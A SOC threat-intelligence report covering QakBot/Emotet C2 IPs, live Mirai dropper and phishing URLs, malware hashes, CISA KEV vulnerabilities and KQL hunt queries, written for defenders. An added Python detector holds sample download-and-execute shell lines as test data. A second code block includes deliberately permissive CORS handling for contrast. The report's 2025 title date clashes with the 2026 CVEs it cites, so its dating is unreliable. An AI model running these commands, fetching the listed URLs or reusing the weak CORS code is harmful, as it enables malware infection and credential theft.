โ† Back to Dashboard
May 23, 2026

Daily Threat Intelligence Report — 2025-07-14

28 IOCs | 12 TTPs | 12 KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed across five IPs by Feodotracker, representing an immediate risk to enterprise endpoints. A confirmed Mirai ELF sample (MalwareBazaar) is being distributed via at least ten malicious shell-script download URLs (URLhaus), signaling an active IoT/Linux botnet recruitment campaign. CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog — including a critical Drupal Core SQL injection (CVE-2026-9082) and a Langflow CORS/RCE flaw (CVE-2025-34291) — requiring immediate patching action. SOC teams should immediately block all five Feodotracker C2 IPs, patch or isolate Drupal and Langflow instances, and increase monitoring for outbound connections to URLhaus-listed hosts.

#1 Active QakBot & Emotet C2 Infrastructure — Multi-Family Banking Trojan Campaign

Severity: CRITICAL | Threat actor: TA505

Feodotracker has confirmed five active command-and-control servers operating in the last 24 hours: four serving QakBot (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and one serving Emotet (162.243.103.246). QakBot and Emotet are consistently leveraged by TA505 and affiliated initial-access brokers to establish persistent footholds that are subsequently monetized via ransomware deployment (e.g., Cl0p, BlackBasta). The geographic spread of C2 infrastructure across the US, UK, and Japan indicates deliberate infrastructure diversification to evade geo-based blocking. Any outbound connection to these IPs from an enterprise endpoint should be treated as a confirmed compromise requiring immediate isolation and full forensic investigation.

🔴 Indicators of Compromise
IP 162.243.103.246 Emotet C2 server hosted in US — Feodotracker confirmed active
IP 50.16.16.211 QakBot C2 server hosted in US — Feodotracker confirmed active
IP 34.204.119.63 QakBot C2 server hosted in US — Feodotracker confirmed active
IP 178.62.3.223 QakBot C2 server hosted in GB — Feodotracker confirmed active
IP 27.133.154.218 QakBot C2 server hosted in JP — Feodotracker confirmed active
URL https://sfke-cahmcjf3b4fagvat.z03.azurefd.net/ Active phishing URL hosted on Azure Front Door — OpenPhish confirmed, likely used for credential harvesting as initial access vector supporting downstream QakBot/Emotet delivery
URL http://wvwlistgtsfrsdrtosthts.fwh.is/ Active phishing URL — OpenPhish confirmed
HASH faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0 PE executable dropped by GCleaner (tagged: dropped-by-GCleaner, exe, US.file) — MalwareBazaar confirmed; GCleaner is a known pay-per-install loader used to distribute QakBot and similar banking trojans
🟣 MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment
T1071.001 Application Layer Protocol: Web Protocols
T1055 Process Injection
T1078 Valid Accounts
🟢 Hunt Queries
MDE Hunt for C2 connections to QakBot and Emotet infrastructure

Detects outbound network connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers active in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect GCleaner dropper execution by hash

Identifies execution of the GCleaner-tagged dropper sample confirmed by MalwareBazaar as a QakBot distribution mechanism.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0'
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName, AccountName
| order by TimeGenerated desc
MDI Detect lateral movement patterns associated with TA505 post-QakBot compromise

Hunts for suspicious NTLM authentication patterns consistent with credential harvesting and lateral movement following a QakBot/Emotet compromise.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or UniqueDevices > 3
| order by LogonCount desc
SENTINEL Detect connections to active phishing infrastructure linked to TA505 initial access

Identifies outbound connections to OpenPhish-confirmed phishing URLs used as initial access vectors preceding QakBot/Emotet delivery.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('sfke-cahmcjf3b4fagvat.z03.azurefd.net', 'wvwlistgtsfrsdrtosthts.fwh.is', 'kakefot735bezill.crabdance.com', 'saldonuturbinado.s3.us-east-005.backblazeb2.com')
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and endpoint-level via EDR network control
→ IMMEDIATE: Add MalwareBazaar hash faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0 to AV/EDR block list and scan all endpoints for historical execution
→ IMMEDIATE: Block OpenPhish-confirmed phishing URLs at web proxy and email gateway; prioritize sfke-cahmcjf3b4fagvat.z03.azurefd.net and wvwlistgtsfrsdrtosthts.fwh.is
→ SHORT-TERM: Execute all four KQL queries across MDE, MDI, and Sentinel; escalate any hits as Priority 1 incidents
→ SHORT-TERM: Isolate any endpoint with confirmed outbound connection to the five C2 IPs and initiate full forensic collection
→ SHORT-TERM: Brief SOC tier-1 analysts to treat any connection to the listed IPs as a confirmed compromise — do not wait for additional corroboration
→ LONG-TERM: Integrate Feodotracker C2 feed as an automated daily block-list update in firewall and proxy policy
→ LONG-TERM: Implement email gateway rules to block GCleaner-associated attachment patterns (password-protected archives, double-extension files)
#2 Active Mirai Botnet Campaign — Linux/IoT Shell Script Dropper Distribution via URLhaus

Severity: HIGH | Threat actor: Unknown

MalwareBazaar has confirmed an active Mirai ELF binary (SHA256: a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da, tags: elf, Mirai) circulating alongside multiple shell-script (sh-tagged) samples, while URLhaus has simultaneously flagged ten malicious URLs actively serving bin.sh and similar dropper scripts from IPs across multiple Asia-Pacific ranges. This pattern is consistent with automated exploitation of exposed Linux services and IoT devices — commonly targeting default credentials, Telnet, SSH, and unpatched RCE vulnerabilities — to recruit devices into a DDoS botnet. The AlienVault OTX pulse 'Untangling a Linux Incident With an OpenAI Twist (Part 2)' corroborates simultaneous multi-actor Linux endpoint compromises including cryptominer deployment, suggesting these URLhaus drop-points may serve multiple payloads beyond Mirai. Organizations with internet-exposed Linux servers, NAS devices, routers, or IP cameras are at heightened risk and should audit for unauthorized outbound connections immediately.

🔴 Indicators of Compromise
HASH a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da Confirmed Mirai ELF binary — MalwareBazaar tags: elf, Mirai — active IoT/Linux botnet payload
HASH e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1 Shell script sample (tag: sh) — MalwareBazaar confirmed — likely Mirai dropper or installer script
HASH bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c Shell script sample (tag: sh) — MalwareBazaar confirmed — likely Mirai dropper or installer script
HASH 10bbd20b2f26a8e93ac0c4df3cb4f9c6b984c40f64e93f80846439e7374d4ce4 Shell script sample (tag: sh) — MalwareBazaar confirmed — likely Mirai dropper or installer script
URL http://119.184.28.228:51291/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL http://110.36.20.58:36809/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL http://115.53.216.50:47211/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL http://125.47.113.44:38895/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL http://119.187.136.55:37418/i Active malware download URL — URLhaus confirmed malware_download — serving payload binary
URL http://39.90.151.181:39300/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL https://paqcfwvt.winter-pulse.christmas/a754bad3-7e7b-479d-b307-bcbfcb2a933f Active malware download URL using holiday-themed domain — URLhaus confirmed malware_download
URL http://115.55.8.145:60626/i Active malware download URL — URLhaus confirmed malware_download
URL http://115.55.173.134:40180/bin.sh Active Mirai dropper delivery URL — URLhaus confirmed malware_download
URL https://mokmgdal.gift-lattice.christmas/3e376a3d-065b-463f-93dd-8721c73c2e12 Active malware download URL using holiday-themed domain — URLhaus confirmed malware_download
🟣 MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application
T1059.004 Command and Scripting Interpreter: Unix Shell
T1498 Network Denial of Service
T1110.001 Brute Force: Password Guessing
🟢 Hunt Queries
MDE Detect downloads from Mirai bin.sh distribution URLs

Identifies processes making network connections to URLhaus-confirmed Mirai dropper distribution IPs on the specific high ports observed in the campaign.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('119.184.28.228', '110.36.20.58', '115.53.216.50', '125.47.113.44', '119.187.136.55', '39.90.151.181', '115.55.8.145', '115.55.173.134')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Hunt for Mirai ELF binary and sh dropper execution by hash

Detects file creation or process execution events matching confirmed Mirai ELF and shell script dropper hashes from MalwareBazaar.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da',
    'e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1',
    'bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c',
    '10bbd20b2f26a8e93ac0c4df3cb4f9c6b984c40f64e93f80846439e7374d4ce4'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName
| order by TimeGenerated desc
SENTINEL Detect connections to URLhaus-confirmed Mirai distribution infrastructure

Identifies any network traffic to the full set of URLhaus-confirmed Mirai dropper distribution URLs and their hosting IPs.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('119.184.28.228', '110.36.20.58', '115.53.216.50', '125.47.113.44', '119.187.136.55', '39.90.151.181', '115.55.8.145', '115.55.173.134')
    or RequestURL has_any ('bin.sh', 'gift-lattice.christmas', 'winter-pulse.christmas')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
SENTINEL Detect wget/curl downloading shell scripts from non-standard ports on Linux endpoints

Hunts for command-line execution patterns consistent with Mirai dropper download-and-execute behavior observed in the URLhaus campaign.

Syslog
| where TimeGenerated > ago(24h)
| where SyslogMessage has_any ('wget', 'curl')
    and SyslogMessage has_any ('bin.sh', '/i ', 'chmod', '/tmp')
    and SyslogMessage matches regex @':(3[0-9]{4}|4[0-9]{4}|5[0-9]{4}|6[0-9]{4})/'
| project TimeGenerated, HostName, SyslogMessage, ProcessName
| order by TimeGenerated desc
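The Syslog hunt above keys on three things appearing together in one message: a download tool, a dropper-style path, and a non-standard high port in the URL. What follows is an added example, not code from the report or from URLhaus, that applies the same three checks to constructed RFC 3164-style syslog lines (documentation-range IPs and hypothetical host names) so the logic can be exercised offline before the KQL is tuned. A line failing any one check is dropped; two of the four sample lines are deliberate near-misses (a standard port, no port at all).

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added illustration of the Syslog hunt in this report (not the report's own
# code): flag a message only when a downloader, a dropper-style path and a
# non-standard high port in the URL are all present.
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
# Mirrors has_any('bin.sh', '/i ', 'chmod', '/tmp') from the KQL.
DROPPER_HINT = re.compile(r"bin\.sh|/i(?=\s|$)|chmod|/tmp")
# Mirrors the KQL port classes :3xxxx/ .. :6xxxx/. Heuristic only: the 6xxxx
# class admits values above the real 65535 maximum, exactly as the query does.
HIGH_PORT_URL = re.compile(r":(3[0-9]{4}|4[0-9]{4}|5[0-9]{4}|6[0-9]{4})/")


@dataclass
class Hit:
    host: str
    port: int
    message: str


def parse_host(line: str) -> str:
    """RFC 3164-style syslog: '<Mon> <day> <time> <host> <tag>: <msg>'."""
    parts = line.split(maxsplit=4)
    return parts[3] if len(parts) >= 4 else "unknown"


def classify(line: str) -> Optional[Hit]:
    """Return a Hit when all three indicators are present, else None."""
    if not DOWNLOADER.search(line) or not DROPPER_HINT.search(line):
        return None
    m = HIGH_PORT_URL.search(line)
    if not m:
        return None
    return Hit(host=parse_host(line), port=int(m.group(1)), message=line)


def scan(lines) -> List[Hit]:
    """Run classify() over an iterable of syslog lines, keeping only hits."""
    return [h for h in (classify(line) for line in lines) if h]


# Constructed sample log lines (192.0.2.0/24 documentation range, not real hosts).
SAMPLE_LOG = [
    "Jul 14 03:12:44 nas01 sh[2211]: wget http://192.0.2.10:38895/bin.sh -O /tmp/bin.sh; chmod +x /tmp/bin.sh",
    "Jul 14 03:13:01 web02 bash[4410]: curl -s http://192.0.2.20:40180/i > /tmp/i && sh /tmp/i",
    "Jul 14 03:14:20 build01 bash[5120]: curl -fsSL https://mirror.example.org/setup.sh -o /tmp/setup.sh",
    "Jul 14 03:15:02 app03 bash[6001]: wget http://192.0.2.30:8080/bin.sh",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.host}: port {hit.port} -> {hit.message}")
```

The third sample (a package mirror over HTTPS, no port) and the fourth (port 8080) fall through, which matches the query's intent; the port regex is kept identical to the KQL's so results stay comparable, and tightening it to real port numbers or adding tools beyond wget and curl is where tuning would start.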
✅ Recommended Actions
→ IMMEDIATE: Block all ten URLhaus-listed dropper distribution IPs and URLs at perimeter firewall, web proxy, and DNS filtering layers
→ IMMEDIATE: Scan all Linux servers, NAS devices, and IoT assets for the four MalwareBazaar-confirmed hashes (Mirai ELF + sh droppers)
→ IMMEDIATE: Audit internet-facing Linux and IoT devices for default credentials and disable Telnet (port 23) where not required
→ SHORT-TERM: Execute all four KQL queries; any hit on Mirai hash or URLhaus IP should trigger immediate device isolation
→ SHORT-TERM: Block holiday-themed domains gift-lattice.christmas and winter-pulse.christmas at DNS and proxy level — these are confirmed malware distribution domains per URLhaus
→ SHORT-TERM: Review network segmentation to ensure IoT and OT devices cannot directly reach internet-facing hosts or corporate segments
→ LONG-TERM: Implement automated URLhaus feed integration into firewall and DNS blocklists with daily refresh
→ LONG-TERM: Deploy network flow monitoring (NetFlow/IPFIX) on IoT network segments to detect DDoS participation and botnet scanning behavior
#3 CISA KEV Alert — Critical Vulnerabilities in Drupal Core, Langflow, and Trend Micro Apex One Require Immediate Patching

Severity: MEDIUM | Threat actor: Unknown

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog, three of which present immediate high-severity risk to enterprise environments: CVE-2026-9082 (Drupal Core SQL injection enabling privilege escalation and RCE), CVE-2025-34291 (Langflow CORS misconfiguration with SameSite=None cookie allowing cross-origin credential theft and arbitrary code execution), and CVE-2026-34926 (Trend Micro Apex One directory traversal enabling malicious code injection to managed agents). Additionally, legacy vulnerabilities CVE-2008-4250 (Windows Server Service RPC buffer overflow) and CVE-2009-1537 (Microsoft DirectX QuickTime parser RCE) remain on the KEV list, indicating active exploitation of legacy systems still observed in the wild. All five require immediate mitigation per CISA BOD 22-01 guidance; organizations running Drupal CMS, Langflow AI pipelines, or Trend Micro Apex One on-premise should treat this as an emergency patching event. The Langflow vulnerability is particularly concerning given its presence in AI/ML development pipelines, which are increasingly targeted as entry points into sensitive data environments.

🔴 Indicators of Compromise
CVE CVE-2026-9082 Drupal Core SQL injection — privilege escalation and RCE via database abstraction API — CISA KEV confirmed actively exploited
CVE CVE-2025-34291 Langflow origin validation error — overly permissive CORS with SameSite=None refresh token cookie enables cross-origin RCE — CISA KEV confirmed actively exploited
CVE CVE-2026-34926 Trend Micro Apex One directory traversal — pre-authenticated local attacker can inject malicious code deployed to all managed agents — CISA KEV confirmed actively exploited
CVE CVE-2008-4250 Microsoft Windows Server Service buffer overflow via crafted RPC request — remote code execution — CISA KEV confirmed still actively exploited
CVE CVE-2009-1537 Microsoft DirectX QuickTime Movie Parser NULL byte overwrite — remote code execution via crafted media file — CISA KEV confirmed still actively exploited
URL http://soporcoabepmx-01--sopoortcobaepmx.replit.app/ Active phishing URL hosted on Replit — OpenPhish confirmed — representative of web-based delivery infrastructure that may deliver exploits for KEV vulnerabilities
🟣 MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application
T1068 Exploitation for Privilege Escalation
T1203 Exploitation for Client Execution
T1210 Exploitation of Remote Services
🟢 Hunt Queries
MDE Detect exploitation attempts against CVE-2008-4250 Windows Server Service RPC vulnerability

Hunts for Server Service (svchost) spawning unexpected child processes consistent with successful CVE-2008-4250 RPC buffer overflow exploitation.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where InitiatingProcessFileName =~ 'svchost.exe'
| where FileName in~ ('cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe')
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessParentFileName, AccountName
| order by TimeGenerated desc
MDE Detect Trend Micro Apex One directory traversal exploitation (CVE-2026-34926)

Identifies suspicious file access or process activity on Apex One management servers consistent with directory traversal exploitation leading to malicious code injection to agents.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where InitiatingProcessFileName has_any ('TmListen.exe', 'PccNTMon.exe', 'ntrtscan.exe', 'TmCCSF.exe')
// has_any matches indexed terms, not bare punctuation, and '..\' was an unterminated literal (the backslash escapes the quote); use contains with a verbatim string
| where FolderPath contains '../' or FolderPath contains @'..\'
    or FileName endswith '.exe' or FileName endswith '.dll'
| project TimeGenerated, DeviceName, FileName, FolderPath, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect SQL injection attempts against Drupal Core (CVE-2026-9082)

Identifies web requests to Drupal endpoints containing SQL injection patterns consistent with CVE-2026-9082 exploitation attempts.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/drupal/', '/node/', '/user/', '?q=')
    and (RequestURL has_any ('UNION', 'SELECT', 'INSERT', 'DROP', 'SLEEP', '0x') 
         or AdditionalExtensions has_any ('UNION', 'SELECT', 'SLEEP'))
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, RequestMethod, AdditionalExtensions, Activity
| order by TimeGenerated desc
SENTINEL Detect Langflow cross-origin refresh token abuse (CVE-2025-34291)

Identifies anomalous cross-origin requests to Langflow refresh token endpoints that may indicate active exploitation of CVE-2025-34291.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/api/v1/auth/refresh', '/refresh', '/token/refresh')
    and DestinationHostName has_any ('langflow', 'flow')
| extend OriginHeader = extract(@'Origin: ([^\r\n]+)', 1, AdditionalExtensions)
| where OriginHeader != '' and not(OriginHeader has DestinationHostName)
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, OriginHeader, Activity
| order by TimeGenerated desc
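The Langflow item is about an overly permissive CORS policy combined with a SameSite=None refresh-token cookie, and the recommended mitigation is to restrict CORS to trusted origins and move the cookie to Lax or Strict. The block below is an added illustration, not Langflow's code, and assumes nothing about its internals beyond what this report states (the helper names, the cookie name, the trusted origin and the "other-site" origin are all hypothetical placeholders). It places the weak response-header logic next to an allowlisted version that exact-matches the full origin, plus a cookie builder that refuses SameSite=None.

```python
from typing import Dict, Iterable, Optional

# Added illustration of the CORS / SameSite mitigation in this report.
# Not Langflow's code; names and origins are hypothetical placeholders.


def cors_headers_permissive(request_origin: Optional[str]) -> Dict[str, str]:
    """Weak setting: echo whatever Origin arrives and allow credentials.

    Combined with a SameSite=None refresh-token cookie, the browser attaches
    the cookie to cross-site requests and this response lets the other origin
    read the reply, which is the condition the KEV entry describes.
    """
    if not request_origin:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_allowlisted(request_origin: Optional[str],
                             allowed_origins: Iterable[str]) -> Dict[str, str]:
    """Hardened setting: exact match of the full origin (scheme + host + port)
    against a fixed allowlist; any other origin gets no CORS headers at all,
    so the browser withholds the response from that page."""
    allowed = {o.strip().lower().rstrip("/") for o in allowed_origins}
    if not request_origin:
        return {}
    origin = request_origin.strip().lower().rstrip("/")
    if origin not in allowed:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",  # per-origin answers must not be cached across origins
    }


def refresh_cookie_header(token: str, samesite: str = "Lax") -> str:
    """Set-Cookie value for the refresh token; SameSite=None is refused.

    Secure and HttpOnly are always set: the token must never travel over
    plain HTTP or be readable from page script. Cookie name is a placeholder.
    """
    if samesite not in ("Lax", "Strict"):
        raise ValueError("refresh token cookie must be SameSite=Lax or Strict")
    return (f"refresh_token={token}; Path=/; Secure; HttpOnly; "
            f"SameSite={samesite}")


if __name__ == "__main__":
    trusted = ["https://langflow.corp.example"]  # placeholder trusted origin
    for origin in ("https://langflow.corp.example", "https://other-site.example"):
        print(origin, "->", cors_headers_allowlisted(origin, trusted) or "no CORS headers")
    print(refresh_cookie_header("<token>", "Strict"))
```

Lax is usually sufficient for a refresh endpoint called from the application's own origin; Strict is the safer default when the UI never needs the cookie on a top-level navigation from elsewhere. Either way, the allowlist is a set of complete origins compared exactly, not a host-name substring test.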
✅ Recommended Actions
→ IMMEDIATE: Patch or mitigate CVE-2026-9082 (Drupal Core) — apply vendor security update immediately; if patch unavailable, apply WAF rules to block SQL injection patterns against Drupal endpoints and restrict database user privileges
→ IMMEDIATE: Patch or mitigate CVE-2025-34291 (Langflow) — update to patched version; if unavailable, restrict CORS configuration to trusted origins only and change SameSite cookie attribute to Strict or Lax
→ IMMEDIATE: Patch or mitigate CVE-2026-34926 (Trend Micro Apex One on-premise) — apply Trend Micro security update; until patched, restrict access to the Apex One management server console to trusted internal IPs only
→ SHORT-TERM: Audit all Windows systems for CVE-2008-4250 patch status (MS08-067); any unpatched system should be isolated or have SMB/RPC access blocked via host firewall
→ SHORT-TERM: Execute all four SENTINEL and MDE KQL queries to identify potential exploitation attempts in the last 24 hours; escalate any confirmed hits
→ SHORT-TERM: Review Apex One management server logs for unexpected agent policy changes or file modifications in the last 7 days as a retroactive compromise check
→ LONG-TERM: Integrate CISA KEV feed into vulnerability management platform for automated alerting when KEV additions affect assets in your environment
→ LONG-TERM: Implement a 24-hour SLA for patching any vulnerability added to CISA KEV per BOD 22-01 requirements for federal agencies and as best practice for all organizations